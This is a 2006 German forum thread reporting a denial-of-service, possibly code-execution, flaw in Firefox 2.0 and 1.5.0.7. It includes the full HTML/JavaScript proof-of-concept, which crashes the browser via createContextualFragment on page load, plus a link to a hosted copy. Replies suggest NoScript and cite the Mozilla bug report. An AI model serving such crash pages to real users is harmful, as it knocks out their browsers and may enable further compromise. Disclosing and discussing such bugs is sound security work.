Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

FLAW in Firefox 2.0 und 1.5.0.7

Frage Sicherheit

Mitglied: gnarff

gnarff (Level 2) - Jetzt verbinden

02.11.2006, aktualisiert 26.03.2012, 4705 Aufrufe, 2 Kommentare

Eine Schwachstelle in den o.g. genannten Versionen des beliebten Firefoxbrowsers ermoeglicht Denial of Service und u.U. die Ausfuehrung von Remote Code.

Hallo liebe Gemeinde!

Einfach mal auf diesen Link klicken, Browser wird sofort abgeschossen.

PoC hier: http://werterxyz.altervista.org/Firefox2Range.htm
01.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 
02.
<html> 
03.
<head> 
04.
<script type="text/javascript"> 
05.
function do_crash() 
06.
07.
var range; 
08.
 
09.
range = document.createRange(); 
10.
range.selectNode(document.firstChild); 
11.
range.createContextualFragment('<span></span>'); 
12.
13.
</script> 
14.
</head> 
15.
<body onload="do_crash()"> 
16.
<p>Good bye Firefox!</p> 
17.
</body> 
18.
</html>
[31.10.2006, 03:14 am, von "xxxx"]

saludos
gnarff
Mitglied: 11078
02.11.2006 um 08:14 Uhr
Hallo,

nein, stürzt nicht ab. Javascript habe ich nämlich schon lange nicht mehr aktiviert und das kann man nur jedem raten. Beziehungsweise um es differenzierter abzuschalten:

http://www.erweiterungen.de/detail/NoScript/


Gruß,
Tim
Bitte warten ..
Mitglied: gnarff
02.11.2006 um 12:54 Uhr
hallo tim
Hallo,

nein, stürzt nicht ab. Javascript habe
ich nämlich schon lange nicht mehr
aktiviert und das kann man nur jedem raten.
ja, aber der bug im code bleibt trotzallem unbehoben:
https://bugzilla.mozilla.org/show_bug.cgi?id=358797

Beziehungsweise um es differenzierter
abzuschalten:

http://www.erweiterungen.de/detail/NoScript/

gute idee, diese erweiterung kannte ich noch nicht...

Gruß,
Tim

saludos
gnarff
Bitte warten ..
Ähnliche Inhalte
Windows Netzwerk
gelöst Nur Firefox mit Proxy bringt fehler, ohne Proxy geht es (11)

Frage von WinLiCLI zum Thema Windows Netzwerk ...

Webbrowser
Update Firefox ESR 45.9.0 auf ESR 52.0 (7)

Frage von Hajo2006 zum Thema Webbrowser ...

Windows 7
gelöst Firefox Startseite immer auf 110 Prozent (9)

Frage von Geward zum Thema Windows 7 ...

Webbrowser
gelöst Lokale Links (laufwerklinks) öffnen Firefox (1)

Frage von KEFHVDI zum Thema Webbrowser ...

Neue Wissensbeiträge
Tipps & Tricks

Wie Hackt man sich am besten in ein Computernetzwerk ein

(29)

Erfahrungsbericht von Herbrich19 zum Thema Tipps & Tricks ...

Humor (lol)

Bester Vorschlag eines Supporttechnikers ever: APC

(15)

Erfahrungsbericht von DerWoWusste zum Thema Humor (lol) ...

Windows Server

Exchange 2010 Active Directory und Windows Server 2016

(4)

Erfahrungsbericht von Herbrich19 zum Thema Windows Server ...

Heiß diskutierte Inhalte
Internet
gelöst Mitarbeiter surft auf unerwünschter Seite - Wie damit umgehen? (49)

Frage von sabines zum Thema Internet ...

LAN, WAN, Wireless
gelöst Eintägige Netzwerkunterbrechung trotz Backupleitung (15)

Frage von iAmbricksta zum Thema LAN, WAN, Wireless ...

Router & Routing
PFsense - Netzverbindung steht, aber kein Internet vorhanden (14)

Frage von aschmid zum Thema Router & Routing ...

Windows Server
Server 2012 R2 - Zugriff Verweigert bei jeglicher Tätigkeit (13)

Frage von DarkLevi zum Thema Windows Server ...